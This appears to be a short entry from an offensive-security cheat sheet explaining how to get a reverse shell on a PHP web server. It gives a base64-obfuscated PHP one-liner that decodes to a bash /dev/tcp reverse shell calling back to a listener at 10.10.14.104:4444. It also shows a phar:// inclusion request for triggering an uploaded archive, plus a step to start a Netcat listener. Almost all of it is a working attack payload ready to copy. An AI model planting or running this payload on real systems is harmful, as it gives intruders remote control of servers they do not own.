← Back to search

PHP Reverse Shell One-Liner

exploitationtool

Summary

Drop a compact PHP payload that base64-decodes and pipes a bash reverse shell; the phar:// wrapper can trigger included PHP from an uploaded archive.

Walkthrough

A minimal PHP payload that decodes a base64 bash reverse shell and executes it, useful when you can write or include a .php file.

Steps

  1. Upload or inject the one-liner; when executed it base64-decodes a /dev/tcp bash reverse shell and runs it, calling back to your listener.
  2. If you can only upload an archive, use the phar:// wrapper (?page=phar://.../archive.phar/test.txt) to have PHP deserialize/include the embedded payload.
  3. Start a Netcat listener to catch the shell.

Commands

other

<?php `echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTA0LzQ0NDQgMD4mMSAK|base64 -d|bash`; ?>

other

?page=phar:///var/www/html/uploads/archive.phar/test.txt